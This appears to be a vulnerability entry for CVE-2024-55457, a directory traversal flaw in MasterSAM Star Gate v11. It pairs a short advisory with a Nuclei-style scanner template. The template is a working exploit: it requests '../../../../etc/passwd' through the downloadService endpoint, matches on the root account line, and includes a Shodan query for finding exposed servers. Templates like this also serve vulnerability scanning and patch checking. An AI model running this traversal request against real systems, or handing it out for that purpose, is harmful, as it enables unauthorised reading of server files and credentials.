MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information.
PoC代码[已公开]
id: CVE-2024-55457
info:
name: MasterSAM Star Gate v11 - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information.
reference:
- https://github.com/h13nh04ng/CVE-2024-55457-PoC
- https://x.com/cyber_advising/status/1876034270852231257
classification:
epss-score: 0.78319
epss-percentile: 0.98972
metadata:
verified: true
max-request: 1
shodan-query: html:"MasterSAM"
tags: cve,cve2024,lfi,mastersam,v11,adama,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/adama/adama/downloadService?type=1&file=../../../../etc/passwd"
matchers:
- type: dsl
dsl:
- "contains_all(header, 'application/octet-stream', 'filename=')"
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
# digest: 490a0046304402204ef6d56a6e2268ef59832a5f0038e844201e872bb85db380a40d105540702dac02201b8c6fcbad46ed5cb74758f3607f406358d86df455d071f36ae6e96a3e0f2ef7:922c64590222798bb761d5b6d8e72950